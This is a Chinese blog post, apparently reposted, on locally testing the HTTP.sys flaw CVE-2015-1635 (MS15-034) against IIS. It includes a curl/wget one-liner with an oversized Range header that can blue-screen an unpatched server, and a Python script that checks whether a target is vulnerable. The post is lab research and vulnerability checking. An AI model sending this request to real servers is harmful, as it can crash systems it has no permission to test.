2. 程式人生 > >HTTP.sys 遠端執行程式碼漏洞(CVE-2015-1635)(MS15-034)簡單測試

HTTP.sys 遠端執行程式碼漏洞(CVE-2015-1635)(MS15-034)簡單測試

阿新 發佈:2019-01-10

        無意中用掃描器掃到了HTTP.sys 漏洞,因為之前寫過python單poc指令碼,感覺exp應該也是存在的。本著常識的心態找一下利用程式碼,如果能提權是再好不過的。

    根據網上的記錄,此漏洞利用最多的是導致藍屏。RCE還無法找到,可能被大牛私藏了。由於會導致BSOD,所以只能在本地進行測試了。步驟如下:

    1、環境搭建,由於本人的server只有2003,只能安裝iis6.0,且需要下載安裝包進行下載,系統無自帶。此漏洞存在於iis6.0以上版本,所以無法成功。

    2、用win7進行環境搭建,步驟可參考:https://jingyan.baidu.com/article/2fb0ba40916a1c00f2ec5ff7.html,由於我們只需要一個歡迎頁面,所以安裝成功後即可。還有一個問題是防火牆需要進行關閉,否則從區域網進行訪問。

    3、比較簡單的方法是使用一行命令:wget –header=Range: bytes=18-18446744073709551615”  http:victim/welcome.png,圖片是iis的預設圖片地址。由於我使用的mac沒有wget命令,所以使用curl進行替代,命令如下:

        curl  -H"Range: bytes=18-18446744073709551615"  victim/welcome.png 

    之前url我使用了http://的格式發現一直無法成功,後來去掉http://後,成功。


最後附上poc指令碼:

# -*- coding: utf-8 -*-

import requests
def identify_iis(domain):

    req = requests.get(str(domain))

    remote_server = req.headers['server']

    if 'Microsoft-IIS' in remote_server:

        print('服務是' + remote_server)

        ms15_034_test(str(domain))

    else:

        print('伺服器不是IIS\n可能是: ' + remote_server)

def ms15_034_test(domain):

    print('啟動vuln檢查!')

    headers = {'Host': 'stuff','Range': 'bytes=0-18446744073709551615'}

    req = requests.get(str(domain), headers = headers)

    if 'Requested Range Not Satisfiable' in req.content:

        print '存在HTTP.sys遠端程式碼執行漏洞!'

    elif 'The request has an invalid header name' in req.content:

        print '漏洞已修復'

    else:

        print 'IIS服務無法顯示漏洞是否存在,需要手動檢測'

if __name__== '__main__':

    usr_domain = raw_input('輸入域名掃描: ')
    identify_iis(usr_domain)

相關推薦

HTTP.sys 遠端執行程式碼漏洞(CVE-2015-1635)(MS15-034)簡單測試

        無意中用掃描器掃到了HTTP.sys 漏洞,因為之前寫過python單poc指令碼,感覺exp應該也是存在的。本著常識的心態找一下利用程式碼,如果能提權是再好不過的。    根據網上的記

CVE-2015-1635-HTTP.SYS遠端執行程式碼漏洞復現

CVE-2015-1635-HTTP.SYS遠端執行程式碼漏洞復現 一、漏洞描述 遠端執行程式碼漏洞存在於 HTTP 協議堆疊 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。 成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意程式碼。 微軟官方

HTTP.SYS遠端程式碼執行漏洞CVE-2015-1635,MS15-034

漏洞描述及滲透過程 HTTP協議堆疊(HTTP.sys)中存在一個遠端執行程式碼漏洞,該漏洞是在HTTP.sys不正確地分析特製HTTP請求時引起的。   漏洞危害 攻擊者只需要傳送惡意的http請求資料包,就可能遠端讀取IIS伺服器的記憶體資料,或使伺服器系統藍屏崩潰

Windows VBScript引擎遠端執行程式碼漏洞 CVE-2018-8174分析與利用

漏洞簡介   VBScript引擎處理記憶體中物件的方式中存在一個遠端執行程式碼漏洞。該漏洞可能以一種攻擊者可以在當前使用者的上下文中執行任意程式碼的方式來破壞記憶體。成功利用此漏洞的攻擊者可以獲得與當前使用者相同的使用者許可權。如果當前使用者使用管理使用者許可權登入,則成功利

Android WebView遠端執行程式碼漏洞淺析

在過去的一段時間裡,WebView遠端程式碼執行漏洞可以說是橫掃了一大批的Android App,查詢一些漏洞平臺可以得到大致的情況,鑑於很多存在漏洞的App並沒有披露,因此WebVeiw遠端執行程式碼漏洞的影響程度會更大。由於Google Android 系統碎片化程

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553) 一、漏洞描述 該漏洞在/install/index.php(index.php.bak)檔案中,漏洞起因是$$符號使用不當,導致變數覆蓋,以至於最後引起遠端檔案包含漏洞。 二、漏洞影響版本 DeDeCMS < 5.7-

【每日安全資訊】安全專家發現Edge零日漏洞:可遠端執行程式碼

安全研究專家Yushi Liang表示正計劃公開Edge瀏覽器的零日漏洞。該漏洞能夠執行遠端程式碼,並能從Edge的沙盒中逃脫。Liang在一則推文中演示了利用該漏洞從網頁端開啟桌面的計算器應用,推文中寫道:“我們剛剛攻破Edge,和kochkov合作找到了這個穩定漏洞,支援自身SBX即將到

齊博cms最新SQL注入網站漏洞遠端執行程式碼提權

齊博cms整站系統,是目前建站系統用的較多的一款CMS系統,開源,免費,第三方擴充套件化,介面視覺化的操作,使用簡單,便於新手使用和第二次開發,受到許多站長們的喜歡。開發架構使用的是php語言以及mysql資料庫,強大的網站併發能力。於近日,我們SINE安全公司發現齊博cms

谷歌釋放補丁修復影響Android作業系統的特權提升漏洞CVE-2015-1805

谷歌釋出了緊急安全補丁來修復影響Android作業系統的特權提升漏洞CVE-2015-1805。 影響所有Nexus裝置和部分安卓 谷歌已經發布了緊急安全補丁來修復影響Android 作業系統裝置核心的特權提升漏洞CVE-2015-1805。該漏洞屬高危漏洞,可用於提升許可權並在存在漏洞的裝置上執行

ElasticSearch遠端任意程式碼執行漏洞(CVE-2014-3120)分析

原理 這個漏洞實際上非常簡單,ElasticSearch有指令碼執行(scripting)的功能,可以很方便地對查詢出來的資料再加工處理。 ElasticSearch用的指令碼引擎是MVEL,這個引擎沒有做任何的防護,或者沙盒包裝,所以直接可以執行任意程式碼。 而在Elas

Zabbix爆遠端程式碼執行漏洞、資料庫寫入高危漏洞(CVE-2017-2824)

題圖:By James Padolsey From Unsplash 關於Zabbix zabbix是一個基於WEB介面的提供分散式系統監視以及網路監視功能的企業級的開源解決方案。 zabbix能監視各種網路引數,保證伺服器系統的安全運營;並提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種

CVE-2015-1427(Groovy 沙盒繞過 && 程式碼執行漏洞

1、vulhub環境搭建 2、啟動docker環境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、訪

http.sys遠程代碼執行漏洞MS15-034

bsp 描述 style windows zh-cn port c代碼 win pan 0x01漏洞描述 遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者

ECShop全系列版本遠端程式碼執行高危漏洞復現

預警 2018年9月1日,阿里雲態勢感知釋出預警,近日利用ECShop全系列版本的遠端程式碼執行漏洞進行批量化攻擊量呈上升趨勢,該漏洞可直接導致網站伺服器淪陷,黑客可通過WEB攻擊直接獲得伺服器許可權,利用簡單且危害較大。因此,阿里雲安全專家提醒ECShop系統使用者及時進行修復。早

漏洞預警 | ECShop 全系列版本遠端程式碼執行高危漏洞

2018年9月1日,阿里雲態勢感知釋出預警,近日利用ECShop全系列版本的遠端程式碼執行漏洞進行批量化攻擊量呈上升趨勢,該漏洞可直接導致網站伺服器淪陷,黑客可通過WEB攻擊直接獲得伺服器許可權,利用簡單且危害較大。因此,阿里雲安全專家提醒ECShop系統使用

php cgi遠端任意程式碼執行漏洞

There is a vulnerability in certain CGI-based setups (Apache+mod_php and nginx+php-fpm are not affected)that has gone unnoticed for at least 8 years. Sec

Java RMI遠端反序列化任意類及遠端程式碼執行解析(CVE-2017-3241 )

本打算慢慢寫出來的,但前幾天發現國外有研究員發了一篇關於這個CVE的文章,他和我找到的地方很相似。然而不知道是不是Oracle認為是同一個漏洞然後合併了CVE,還是說我找錯了CVE。 總之,先簡單描述一下漏洞:對於任何一個以物件為引數的RMI介面,你都可以發一個自己構建的物件,迫使伺服器端將這個物件按任

ECShop全系列版本遠端程式碼執行高危漏洞分析+實戰提權

漏洞概述   ECShop的user.php檔案中的display函式的模版變數可控,導致注入,配合注入可達到遠端程式碼執行。攻擊者無需登入站點等操作,可以直接遠端寫入webshell,危害嚴重。 漏洞評級   嚴重 影響範圍   ECShop全系列版本,包括2.x

Joomla 3.0.0 -3.4.6遠端程式碼執行(RCE)漏洞復現

Joomla 3.0.0 -3.4.6遠端程式碼執行(RCE)漏洞復現   一、漏洞描述   Joomla是一套內容管理系統,是使用PHP語言加上MYSQL資料庫所開發的軟體系統,最新版本為3.9.12,官網: https://downloads.joomla.org/,漏洞位於根目錄下的

Office遠程代碼執行漏洞CVE-2017-0199復現

read 方式 觀察 data n3k -s 執行 rip 最大限度 在剛剛結束的BlackHat2017黑帽大會上,最佳客戶端安全漏洞獎頒給了CVE-2017-0199漏洞,這個漏洞是Office系列辦公軟件中的一個邏輯漏洞,和常規的內存破壞型漏洞不同,這